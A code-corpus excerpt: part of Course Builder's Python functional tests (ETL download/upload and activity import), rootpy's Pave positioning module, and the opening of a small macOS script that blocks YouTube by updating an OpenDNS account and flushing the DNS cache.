namespace_manager.set_namespace(old_namespace)
# Delete against a datastore without contents runs successfully.
etl.main(self.delete_datastore_args, environment_class=FakeEnvironment)
def test_disable_remote_cannot_be_passed_for_mode_other_than_run(self):
bad_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args +
['--disable_remote'])
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_download_course_creates_valid_archive(self):
"""Tests download of course data and archive creation."""
self.upload_all_sample_course_files([])
self.import_sample_course()
etl.main(self.download_course_args, environment_class=FakeEnvironment)
# Don't use Archive and Manifest here because we want to test the raw
# structure of the emitted zipfile.
zip_archive = zipfile.ZipFile(self.archive_path)
manifest = transforms.loads(
zip_archive.open(etl._MANIFEST_FILENAME).read())
self.assertGreaterEqual(
courses.COURSE_MODEL_VERSION_1_3, manifest['version'])
self.assertEqual(
'course:%s::ns_test' % self.url_prefix, manifest['raw'])
for entity in manifest['entities']:
self.assertTrue(entity.has_key('is_draft'))
self.assertTrue(zip_archive.open(entity['path']))
def test_download_course_errors_if_archive_path_exists_on_disk(self):
self.upload_all_sample_course_files([])
self.import_sample_course()
etl.main(self.download_course_args, environment_class=FakeEnvironment)
self.assertRaises(
SystemExit, etl.main, self.download_course_args,
environment_class=FakeEnvironment)
def test_download_errors_if_course_url_prefix_does_not_exist(self):
sites.reset_courses()
self.assertRaises(
SystemExit, etl.main, self.download_course_args,
environment_class=FakeEnvironment)
def test_download_course_errors_if_course_version_is_pre_1_3(self):
args = etl.PARSER.parse_args(
['download', 'course', '/'] + self.common_course_args[2:])
self.upload_all_sample_course_files([])
self.import_sample_course()
self.assertRaises(
SystemExit, etl.main, args, environment_class=FakeEnvironment)
def test_download_datastore_fails_if_datastore_types_not_in_datastore(self):
download_datastore_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--datastore_types', 'missing'])
self.assertRaises(
SystemExit, etl.main, download_datastore_args,
environment_class=FakeEnvironment)
def test_download_datastore_succeeds(self):
"""Test download of datastore data and archive creation."""
download_datastore_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--datastore_types', 'Student,StudentPropertyEntity'])
context = etl_lib.get_context(download_datastore_args.course_url_prefix)
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
first_student = models.Student(key_name='first_student')
second_student = models.Student(key_name='second_student')
first_entity = models.StudentPropertyEntity(
key_name='first_student-property_entity')
second_entity = models.StudentPropertyEntity(
key_name='second_student-property_entity')
db.put([first_student, second_student, first_entity, second_entity])
finally:
namespace_manager.set_namespace(old_namespace)
etl.main(
download_datastore_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
self.assertEqual(
['Student.json', 'StudentPropertyEntity.json'],
sorted(
[os.path.basename(e.path) for e in archive.manifest.entities]))
student_entity = [
e for e in archive.manifest.entities
if e.path.endswith('Student.json')][0]
entity_entity = [
e for e in archive.manifest.entities
if e.path.endswith('StudentPropertyEntity.json')][0]
# Ensure .json files are deserializable into Python objects.
students = sorted(
transforms.loads(archive.get(student_entity.path))['rows'],
key=lambda d: d['key.name'])
entities = sorted(
transforms.loads(archive.get(entity_entity.path))['rows'],
key=lambda d: d['key.name'])
# Spot check their contents.
self.assertEqual(
[model.key().name() for model in [first_student, second_student]],
[student['key.name'] for student in students])
self.assertEqual(
[model.key().name() for model in [first_entity, second_entity]],
[entity['key.name'] for entity in entities])
def test_download_datastore_with_privacy_maintains_references(self):
"""Test download of datastore data and archive creation."""
unsafe_user_id = '1'
download_datastore_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--datastore_types', 'EventEntity,Student', '--privacy',
'--privacy_secret', 'super_seekrit'])
context = etl_lib.get_context(download_datastore_args.course_url_prefix)
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
event = models.EventEntity(user_id=unsafe_user_id)
student = models.Student(
key_name='first_student', user_id=unsafe_user_id)
db.put([event, student])
finally:
namespace_manager.set_namespace(old_namespace)
etl.main(
download_datastore_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
self.assertEqual(
['EventEntity.json', 'Student.json'],
sorted(
[os.path.basename(e.path) for e in archive.manifest.entities]))
event_entity_entity = [
e for e in archive.manifest.entities
if e.path.endswith('EventEntity.json')][0]
student_entity = [
e for e in archive.manifest.entities
if e.path.endswith('Student.json')][0]
# Ensure .json files are deserializable into Python objects...
event_entities = transforms.loads(
archive.get(event_entity_entity.path))['rows']
students = transforms.loads(archive.get(student_entity.path))['rows']
# Reference maintained.
self.assertEqual(event_entities[0]['user_id'], students[0]['user_id'])
# But user_id transformed.
self.assertNotEqual(unsafe_user_id, event_entities[0]['user_id'])
self.assertNotEqual(unsafe_user_id, students[0]['user_id'])
def test_privacy_fails_if_not_downloading_datastore(self):
wrong_mode = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args + ['--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_mode, environment_class=FakeEnvironment)
wrong_type = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args + ['--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_type, environment_class=FakeEnvironment)
def test_privacy_secret_fails_if_not_download_datastore_with_privacy(self):
"""Tests invalid flag combinations related to --privacy."""
missing_privacy = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--privacy_secret', 'foo'])
self.assertRaises(
SystemExit, etl.main, missing_privacy,
environment_class=FakeEnvironment)
self.assertRaises(
SystemExit, etl.main, missing_privacy,
environment_class=FakeEnvironment)
wrong_mode = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args +
['--privacy_secret', 'foo', '--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_mode, environment_class=FakeEnvironment)
wrong_type = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args +
['--privacy_secret', 'foo', '--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_type, environment_class=FakeEnvironment)
def test_run_fails_when_delegated_argument_parsing_fails(self):
bad_args = etl.PARSER.parse_args(
['run', 'tools.etl_lib.Job'] + self.common_args +
['--job_args', "'unexpected_argument'"])
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_run_fails_when_if_requested_class_missing_or_invalid(self):
bad_args = etl.PARSER.parse_args(
['run', 'a.missing.class.or.Module'] + self.common_args)
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
bad_args = etl.PARSER.parse_args(
['run', 'tools.etl.etl._Archive'] + self.common_args)
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_run_print_memcache_stats_succeeds(self):
"""Tests examples.WriteStudentEmailsToFile prints stats to stdout."""
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.PrintMemcacheStats'] + self.common_args)
memcache.get('key')
memcache.set('key', 1)
memcache.get('key')
old_stdout = sys.stdout
stdout = cStringIO.StringIO()
try:
sys.stdout = stdout
etl.main(args, environment_class=FakeEnvironment)
finally:
sys.stdout = old_stdout
expected = examples.PrintMemcacheStats._STATS_TEMPLATE % {
'byte_hits': 1,
'bytes': 1,
'hits': 1,
'items': 1,
'misses': 1,
'oldest_item_age': 0,
}
self.assertTrue(expected in stdout.getvalue())
def test_run_skips_remote_env_setup_when_disable_remote_passed(self):
args = etl.PARSER.parse_args(
['run', 'tools.etl.etl_lib.Job'] + self.common_args +
['--disable_remote'])
etl.main(args)
def test_run_upload_file_to_course_succeeds(self):
"""Tests upload of a single local file to a course."""
path = os.path.join(self.test_tempdir, 'file')
target = 'assets/file'
remote_path = os.path.join(appengine_config.BUNDLE_ROOT, target)
contents = 'contents'
with open(path, 'w') as f:
f.write(contents)
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.UploadFileToCourse'] +
self.common_args + ['--job_args=%s %s' % (path, target)])
sites.setup_courses(self.raw)
context = etl_lib.get_context(args.course_url_prefix)
self.assertFalse(context.fs.impl.get(remote_path))
etl.main(args, environment_class=FakeEnvironment)
self.assertEqual(contents, context.fs.impl.get(remote_path).read())
def test_run_write_student_emails_to_file_succeeds(self):
"""Tests args passed to and run of examples.WriteStudentEmailsToFile."""
email1 = 'email1@example.com'
email2 = 'email2@example.com'
path = os.path.join(self.test_tempdir, 'emails')
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.WriteStudentEmailsToFile'] +
self.common_args + ['--job_args=%s --batch_size 1' % path])
context = etl_lib.get_context(args.course_url_prefix)
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
first_student = models.Student(key_name=email1)
second_student = models.Student(key_name=email2)
db.put([first_student, second_student])
finally:
namespace_manager.set_namespace(old_namespace)
etl.main(args, environment_class=FakeEnvironment)
self.assertEqual('%s\n%s\n' % (email1, email2), open(path).read())
def test_upload_course_fails_if_archive_cannot_be_opened(self):
sites.setup_courses(self.raw)
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_archive_course_json_malformed(self):
self.create_archive()
self.create_empty_course(self.raw)
zip_archive = zipfile.ZipFile(self.archive_path, 'a')
zip_archive.writestr(
etl._Archive.get_internal_path(etl._COURSE_JSON_PATH_SUFFIX),
'garbage')
zip_archive.close()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_archive_course_yaml_malformed(self):
self.create_archive()
self.create_empty_course(self.raw)
zip_archive = zipfile.ZipFile(self.archive_path, 'a')
zip_archive.writestr(
etl._Archive.get_internal_path(etl._COURSE_YAML_PATH_SUFFIX),
'{')
zip_archive.close()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_course_has_non_course_yaml_contents(self):
self.upload_all_sample_course_files([])
self.import_sample_course()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_force_overwrite_passed_with_bad_args(self):
self.create_archive()
bad_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args + [
'--force_overwrite'])
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_upload_course_fails_if_no_course_with_url_prefix_found(self):
self.create_archive()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_succeeds(self):
"""Tests upload of archive contents."""
self.create_archive()
self.create_empty_course(self.raw)
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
self.assertNotEqual(self.new_course_title, context.get_title())
etl.main(self.upload_course_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
filesystem_contents = context.fs.impl.list(appengine_config.BUNDLE_ROOT)
self.assertEqual(
len(archive.manifest.entities), len(filesystem_contents))
self.assertEqual(self.new_course_title, context.get_title())
units = etl._get_course_from(context).get_units()
spot_check_single_unit = [u for u in units if u.unit_id == 9][0]
self.assertEqual('Interpreting results', spot_check_single_unit.title)
for unit in units:
self.assertTrue(unit.title)
for entity in archive.manifest.entities:
full_path = os.path.join(
appengine_config.BUNDLE_ROOT,
etl._Archive.get_external_path(entity.path))
stream = context.fs.impl.get(full_path)
self.assertEqual(entity.is_draft, stream.metadata.is_draft)
def test_upload_course_with_force_overwrite_succeeds(self):
"""Tests upload into non-empty course with --force_overwrite."""
self.upload_all_sample_course_files([])
self.import_sample_course()
etl.main(self.download_course_args, environment_class=FakeEnvironment)
force_overwrite_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_course_args + [
'--force_overwrite'])
etl.main(force_overwrite_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
filesystem_contents = context.fs.impl.list(appengine_config.BUNDLE_ROOT)
self.assertEqual(
len(archive.manifest.entities), len(filesystem_contents))
self.assertEqual(self.new_course_title, context.get_title())
units = etl._get_course_from(context).get_units()
spot_check_single_unit = [u for u in units if u.unit_id == 9][0]
self.assertEqual('Interpreting results', spot_check_single_unit.title)
for unit in units:
self.assertTrue(unit.title)
for entity in archive.manifest.entities:
full_path = os.path.join(
appengine_config.BUNDLE_ROOT,
etl._Archive.get_external_path(entity.path))
stream = context.fs.impl.get(full_path)
self.assertEqual(entity.is_draft, stream.metadata.is_draft)
def test_upload_datastore_fails(self):
upload_datastore_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args +
['--datastore_types', 'doesnt_matter'])
self.assertRaises(
NotImplementedError, etl.main, upload_datastore_args,
environment_class=FakeEnvironment)
class EtlPrivacyTransformFunctionTestCase(actions.TestBase):
"""Tests privacy transforms."""
# Testing protected functions. pylint: disable-msg=protected-access
def test_hmac_sha_2_256_is_stable(self):
self.assertEqual(
etl._hmac_sha_2_256('secret', 'value'),
etl._hmac_sha_2_256('secret', 'value'))
def test_is_identity_transform_when_privacy_false(self):
self.assertEqual(
1, etl._get_privacy_transform_fn(False, 'no_effect')(1))
self.assertEqual(
1, etl._get_privacy_transform_fn(False, 'other_value')(1))
def test_is_hmac_sha_2_256_when_privacy_true(self):
self.assertEqual(
etl._hmac_sha_2_256('secret', 'value'),
etl._get_privacy_transform_fn(True, 'secret')('value'))
# TODO(johncox): re-enable these tests once we figure out how to make webtest
# play nice with remote_api.
class EtlRemoteEnvironmentTestCase(actions.TestBase):
"""Tests tools/etl/remote.py."""
# Method name determined by superclass. pylint: disable-msg=g-bad-name
def setUp(self):
super(EtlRemoteEnvironmentTestCase, self).setUp()
self.test_environ = copy.deepcopy(os.environ)
# Allow access to protected members under test.
# pylint: disable-msg=protected-access
def disabled_test_can_establish_environment_in_dev_mode(self):
# Stub the call that requires user input so the test runs unattended.
self.swap(__builtin__, 'raw_input', lambda _: 'username')
self.assertEqual(os.environ['SERVER_SOFTWARE'], remote.SERVER_SOFTWARE)
# establish() performs RPC. If it doesn't throw, we're good.
remote.Environment('mycourse', 'localhost:8080').establish()
def disabled_test_can_establish_environment_in_test_mode(self):
self.test_environ['SERVER_SOFTWARE'] = remote.TEST_SERVER_SOFTWARE
self.swap(os, 'environ', self.test_environ)
# establish() performs RPC. If it doesn't throw, we're good.
remote.Environment('mycourse', 'localhost:8080').establish()
class CourseUrlRewritingTest(CourseUrlRewritingTestBase):
"""Run all existing tests using '/courses/pswg' base URL rewrite rules."""
class VirtualFileSystemTest(VirtualFileSystemTestBase):
"""Run all existing tests using virtual local file system."""
class MemcacheTestBase(actions.TestBase):
"""Executes all tests with memcache enabled."""
def setUp(self): # pylint: disable-msg=g-bad-name
super(MemcacheTestBase, self).setUp()
config.Registry.test_overrides = {models.CAN_USE_MEMCACHE.name: True}
def tearDown(self): # pylint: disable-msg=g-bad-name
config.Registry.test_overrides = {}
super(MemcacheTestBase, self).tearDown()
class MemcacheTest(MemcacheTestBase):
"""Executes all tests with memcache enabled."""
class TransformsJsonFileTestCase(actions.TestBase):
"""Tests for models/transforms.py's JsonFile."""
# Method name determined by superclass. pylint: disable-msg=g-bad-name
def setUp(self):
super(TransformsJsonFileTestCase, self).setUp()
# Treat as module-protected. pylint: disable-msg=protected-access
self.path = os.path.join(self.test_tempdir, 'file.json')
self.reader = transforms.JsonFile(self.path)
self.writer = transforms.JsonFile(self.path)
self.first = 1
self.second = {'c': 'c_value', 'd': {'nested': 'e'}}
def tearDown(self):
self.reader.close()
self.writer.close()
super(TransformsJsonFileTestCase, self).tearDown()
def test_round_trip_of_file_with_zero_records(self):
self.writer.open('w')
self.writer.close()
self.reader.open('r')
self.assertEqual([], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual({'rows': []}, self.reader.read())
def test_round_trip_of_file_with_one_record(self):
self.writer.open('w')
self.writer.write(self.first)
self.writer.close()
self.reader.open('r')
self.assertEqual([self.first], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual({'rows': [self.first]}, self.reader.read())
def test_round_trip_of_file_with_multiple_records(self):
self.writer.open('w')
self.writer.write(self.first)
self.writer.write(self.second)
self.writer.close()
self.reader.open('r')
self.assertEqual(
[self.first, self.second], [entity for entity in self.reader])
self.reader.reset()
self.assertEqual(
{'rows': [self.first, self.second]}, self.reader.read())
class ImportActivityTests(DatastoreBackedCourseTest):
"""Functional tests for importing legacy activities into lessons."""
URI = '/rest/course/lesson/activity'
FREETEXT_QUESTION = """
var activity = [
{ questionType: 'freetext',
correctAnswerRegex: /abc/i,
correctAnswerOutput: "Correct.",
incorrectAnswerOutput: "Try again.",
showAnswerOutput: "A hint."
}
];
"""
MULTPLE_CHOICE_QUESTION = """
var activity = [
{questionType: 'multiple choice',
choices: [
['a', false, 'A'],
['b', true, 'B'],
['c', false, 'C'],
['d', false, 'D']
]
}
];
"""
MULTPLE_CHOICE_GROUP_QUESTION = """
var activity = [
{questionType: 'multiple choice group',
questionsList: [
{
questionHTML: 'choose a',
choices: ['aa', 'bb'],
correctIndex: 0
},
{
questionHTML: 'choose b or c',
choices: ['aa', 'bb', 'cc'],
correctIndex: [1, 2]
}
]
allCorrectOutput: 'unused',
someIncorrectOutput: 'also unused'
}
];
"""
def setUp(self):
super(ImportActivityTests, self).setUp()
course = courses.Course(None, app_context=self.app_context)
self.unit = course.add_unit()
self.lesson = course.add_lesson(self.unit)
course.update_lesson(self.lesson)
course.save()
email = 'test_admin@google.com'
actions.login(email, is_admin=True)
def load_dto(self, dao, entity_id):
old_namespace = namespace_manager.get_namespace()
new_namespace = self.app_context.get_namespace_name()
try:
namespace_manager.set_namespace(new_namespace)
return dao.load(entity_id)
finally:
namespace_manager.set_namespace(old_namespace)
def get_response_dict(self, activity_text):
request = {
'xsrf_token': XsrfTokenManager.create_xsrf_token('lesson-edit'),
'key': self.lesson.lesson_id,
'text': activity_text
}
response = self.testapp.put(
self.URI, params={'request': transforms.dumps(request)})
return transforms.loads(response.body)
def get_content_from_service(self, activity_text):
response_dict = self.get_response_dict(activity_text)
self.assertEqual(response_dict['status'], 200)
return transforms.loads(response_dict['payload'])['content']
def test_import_multiple_choice(self):
"""Should be able to import a single multiple choice question."""
content = self.get_content_from_service(self.MULTPLE_CHOICE_QUESTION)
m = re.match((
r'^<question quid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question>$'), content)
assert m
quid = m.group(1)
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(question.dict['question'], '')
self.assertEqual(question.dict['multiple_selections'], False)
self.assertEqual(len(question.dict['choices']), 4)
choices = question.dict['choices']
choices_data = [
['a', 0.0, 'A'], ['b', 1.0, 'B'], ['c', 0.0, 'C'],
['d', 0.0, 'D']]
for i, choice in enumerate(choices):
self.assertEqual(choice['text'], choices_data[i][0])
self.assertEqual(choice['score'], choices_data[i][1])
self.assertEqual(choice['feedback'], choices_data[i][2])
def test_import_multiple_choice_group(self):
"""Should be able to import a single 'multiple choice group'."""
content = self.get_content_from_service(
self.MULTPLE_CHOICE_GROUP_QUESTION)
# The tag links to a question group which embeds two questions
m = re.match((
r'^<question-group qgid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question-group>$'), content)
assert m
quid = m.group(1)
question_group = self.load_dto(models.QuestionGroupDAO, quid)
self.assertEqual(question_group.dict['version'], '1.5')
self.assertEqual(
question_group.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(len(question_group.dict['items']), 2)
items = question_group.dict['items']
self.assertEqual(items[0]['weight'], 1.0)
self.assertEqual(items[1]['weight'], 1.0)
# The first question is multiple choice with single selection
quid = items[0]['question']
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
(
'Imported from unit "New Unit", lesson "New Lesson" '
'(question #1, part #1)'))
self.assertEqual(question.dict['question'], 'choose a')
self.assertEqual(question.dict['multiple_selections'], False)
self.assertEqual(len(question.dict['choices']), 2)
choices = question.dict['choices']
self.assertEqual(choices[0]['text'], 'aa')
self.assertEqual(choices[0]['score'], 1.0)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.0)
# The second question is multiple choice with multiple selection
quid = items[1]['question']
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.MULTIPLE_CHOICE)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
(
'Imported from unit "New Unit", lesson "New Lesson" '
'(question #1, part #2)'))
self.assertEqual(question.dict['question'], 'choose b or c')
self.assertEqual(question.dict['multiple_selections'], True)
self.assertEqual(len(question.dict['choices']), 3)
choices = question.dict['choices']
self.assertEqual(choices[0]['text'], 'aa')
self.assertEqual(choices[0]['score'], -1.0)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.5)
self.assertEqual(choices[1]['text'], 'bb')
self.assertEqual(choices[1]['score'], 0.5)
def test_import_freetext(self):
"""Should be able to import a single feettext question."""
content = self.get_content_from_service(self.FREETEXT_QUESTION)
m = re.match((
r'^<question quid="(\d+)" instanceid="[a-zA-Z0-9]{12}">'
r'</question>$'), content)
assert m
quid = m.group(1)
question = self.load_dto(models.QuestionDAO, quid)
self.assertEqual(question.type, models.QuestionDTO.SHORT_ANSWER)
self.assertEqual(question.dict['version'], '1.5')
self.assertEqual(
question.dict['description'],
'Imported from unit "New Unit", lesson "New Lesson" (question #1)')
self.assertEqual(question.dict['question'], '')
self.assertEqual(question.dict['hint'], 'A hint.')
self.assertEqual(question.dict['defaultFeedback'], 'Try again.')
self.assertEqual(len(question.dict['graders']), 1)
grader = question.dict['graders'][0]
self.assertEqual(grader['score'], 1.0)
self.assertEqual(grader['matcher'], 'regex')
self.assertEqual(grader['response'], '/abc/i')
self.assertEqual(grader['feedback'], 'Correct.')
def test_repeated_imports_are_rejected(self):
response_dict = self.get_response_dict(self.FREETEXT_QUESTION)
self.assertEqual(response_dict['status'], 200)
response_dict = self.get_response_dict(self.FREETEXT_QUESTION)
self.assertEqual(response_dict['status'], 412)
self.assertTrue(response_dict['message'].startswith(
'This activity has already been imported.'))
def test_user_must_be_logged_in(self):
actions.logout()
try:
self.get_response_dict(self.FREETEXT_QUESTION)
self.fail('Expected 404')
except AppError:
pass
def test_user_must_have_valid_xsrf_token(self):
request = {
'key': self.lesson.lesson_id,
'text': self.FREETEXT_QUESTION
}
response = self.testapp.put(
self.URI, params={'request': transforms.dumps(request)})
response_dict = transforms.loads(response.body)
self.assertEqual(response_dict['status'], 403)
ALL_COURSE_TESTS = (
StudentAspectTest, AssessmentTest, CourseAuthorAspectTest,
StaticHandlerTest, AdminAspectTest, PeerReviewControllerTest,
PeerReviewDashboardTest, PeerReviewAnalyticsTest)
MemcacheTest.__bases__ += (InfrastructureTest,) + ALL_COURSE_TESTS
CourseUrlRewritingTest.__bases__ += ALL_COURSE_TESTS
VirtualFileSystemTest.__bases__ += ALL_COURSE_TESTS
DatastoreBackedSampleCourseTest.__bases__ += ALL_COURSE_TESTS
| atljohnsen/adlcoursebuilder | tests/functional/test_classes.py | Python | apache-2.0 | 157,784 |
# Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import ROOT
from .. import QROOT, asrootpy
from ..base import Object
from .utils import canvases_with
__all__ = [
'Pave',
'PaveStats',
]
ANCHORS = (
'upper left', 'upper right',
'lower left', 'lower right',
)
# This is another _PadBase hack. See this comment on github
# https://github.com/rootpy/rootpy/pull/342#issuecomment-19864883
class _Positionable(object):
def __init__(self, *args, **kwargs):
self.anchor = kwargs.pop('anchor', 'upper left')
if self.anchor not in ANCHORS:
raise ValueError(
"'{0}' is not a valid anchor position. Use one of {1}".format(
self.anchor, ', '.join(ANCHORS)))
super(_Positionable, self).__init__(*args, **kwargs)
@property
def x1(self):
return self.GetX1()
@property
def x2(self):
return self.GetX2()
@property
def y1(self):
return self.GetY1()
@property
def y2(self):
return self.GetY2()
@x1.setter
def x1(self, value):
self.SetX1(value)
@x2.setter
def x2(self, value):
self.SetX2(value)
@y1.setter
def y1(self, value):
self.SetY1(value)
@y2.setter
def y2(self, value):
self.SetY2(value)
@property
def x1_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
width = float(pad.width_pixels)
return int(self.GetX1() * width)
@property
def x2_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
width = float(pad.width_pixels)
return int(self.GetX2() * width)
@property
def y1_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
height = float(pad.height_pixels)
return int(self.GetY1() * height)
@property
def y2_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
height = float(pad.height_pixels)
return int(self.GetY2() * height)
@x1_pixels.setter
def x1_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
width = float(pad.width_pixels)
self.SetX1(value / width)
@x2_pixels.setter
def x2_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
width = float(pad.width_pixels)
self.SetX2(value / width)
@y1_pixels.setter
def y1_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
height = float(pad.height_pixels)
self.SetY1(value / height)
@y2_pixels.setter
def y2_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
height = float(pad.height_pixels)
self.SetY2(value / height)
@property
def position(self):
return (self.GetX1(), self.GetY1(),
self.GetX2(), self.GetY2())
@position.setter
def position(self, value):
x1, y1, x2, y2 = value
self.SetX1(x1)
self.SetY1(y1)
self.SetX2(x2)
self.SetY2(y2)
for c in canvases_with(self):
c.Modified()
@property
def position_pixels(self):
x1, y1, x2, y2 = self.position
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before setting position in pixels")
width = pad.width_pixels
height = pad.height_pixels
return (int(x1 * width), int(y1 * height),
int(x2 * width), int(y2 * height))
@position_pixels.setter
def position_pixels(self, value):
x1, y1, x2, y2 = value
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before getting position in pixels")
width = float(pad.width_pixels)
height = float(pad.height_pixels)
self.position = (x1 / width, y1 / height,
x2 / width, y2 / height)
@property
def height(self):
return abs(self.GetY2() - self.GetY1())
@property
def width(self):
return abs(self.GetX2() - self.GetX1())
@height.setter
def height(self, value):
if 'upper' in self.anchor:
self.SetY1(self.GetY2() - value)
else:
self.SetY2(self.GetY1() + value)
@width.setter
def width(self, value):
if 'left' in self.anchor:
self.SetX2(self.GetX1() + value)
else:
self.SetX1(self.GetX2() - value)
@property
def height_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before getting position in pixels")
return int(self.height * pad.height_pixels)
@property
def width_pixels(self):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before getting position in pixels")
return int(self.width * pad.width_pixels)
@height_pixels.setter
def height_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before getting position in pixels")
if 'upper' in self.anchor:
self.SetY1(self.GetY2() - value / float(pad.height_pixels))
else:
self.SetY2(self.GetY1() + value / float(pad.height_pixels))
@width_pixels.setter
def width_pixels(self, value):
pad = asrootpy(ROOT.gPad.func())
if not pad:
raise RuntimeError(
"create a pad before getting position in pixels")
if 'left' in self.anchor:
self.SetX2(self.GetX1() + value / float(pad.width_pixels))
else:
self.SetX1(self.GetX2() - value / float(pad.width_pixels))
class Pave(_Positionable, Object, QROOT.TPave):
_ROOT = QROOT.TPave
class PaveStats(_Positionable, Object, QROOT.TPaveStats):
_ROOT = QROOT.TPaveStats
| cms-btv-pog/rootpy | rootpy/plotting/box.py | Python | gpl-3.0 | 6,943 |
#!/usr/bin/python
# frederico@marques.cx
# tubenot.py - Blocks YouTube via OpenDNS. Works with Mac OS X 10.9.5 (Mavericks)
# run as root
from datetime import datetime
import sys
import subprocess
import os
curl = '/usr/bin/curl'
networksetup = '/usr/sbin/networksetup'
# To get a list of network services run "networksetup listallnetworkservices"
netservice = 'Wi-Fi'
# OpenDNS account
odns_user = os.getenv('ODNS_USER')
odns_pass = os.getenv('ODNS_PASS')
odns_resolvers = '208.67.222.222 208.67.220.220'
def get_hour():
return int(datetime.now().strftime('%H'))
def flush_dnscache():
os.system("killall -HUP mDNSResponder")
def update_opendns():
print "Updating IP with OpenDNS"
command = curl + " -s -S -u " + odns_user + ":" + odns_pass + " https://updates.opendns.com/nic/update?hostname=blah"
try:
c = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
result, err = c.communicate()
if result.find('good') == -1:
print >>sys.stderr, "Error!", result
return 0
else:
print "updated", result
return 1
except OSError, err:
print >>sys.stderr, "Execution failed:", err
return 0
def update_resolvers(action):
print action
